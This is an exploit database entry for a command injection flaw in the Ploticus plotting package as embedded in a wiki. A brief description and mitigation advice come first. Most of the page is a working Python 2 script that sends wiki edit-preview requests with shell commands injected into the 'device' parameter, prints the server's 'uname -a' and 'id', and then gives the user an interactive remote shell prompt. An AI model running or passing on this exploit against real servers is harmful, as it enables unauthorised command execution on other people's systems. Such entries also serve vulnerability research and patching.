Command Execution Vulnerability in Ploticus

vendor:

Ploticus

by:

Diskovered

8,8

CVSS

HIGH

Command Injection

CWE

Product Name: Ploticus

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

Command Execution Vulnerability in Ploticus

Ploticus is a software package for generating graphs and plots. It is vulnerable to command injection due to improper sanitization of user input. An attacker can inject arbitrary commands into the 'device' parameter of the Ploticus script, which is then executed on the server.

Mitigation:

Input validation should be used to prevent command injection attacks. Sanitize user input and validate it against a whitelist of acceptable values.

Source

Exploit-DB raw data:

###############################################################
#    ____                    __                  _ __   _ 
#   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)
#  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / 
# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  
#/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   
#             /_/ /_/         /_/                     
# Diskovered in Nov/Dec 2011
###############################################################

import urllib
import urllib2
import sys
def banner():
	print "	    ____                    __                  _ __   _ "
	print "	   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)"
	print "	  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / "
	print "	 / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  "
	print "	/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   "
	print "	             /_/ /_/         /_/                     \n"


def usage():
	banner()
	print "	[+] Usage example"
	print "	[-] python " + sys.argv[0] + " http://path.to/wiki"

if len(sys.argv)< 2:
	usage()
	quit()

domain = sys.argv[1]
def commandexec(cmd):
	data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')])
	cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)
	cmd2 = urllib2.urlopen(cmd1)
	output = cmd2.read()
	firstloc = output.find("123:::\n") + len("123:::\n")
	secondloc = output.find("\n:::123")
	return output[firstloc:secondloc]


banner()
print commandexec('uname -a')
print commandexec('id')
while(quit != 1):
	cmd = raw_input('Run a command: ')
	if cmd == 'quit':
		print "[-] Hope you had fun :)"
		quit = 1
	if cmd != 'quit':
		print commandexec(cmd)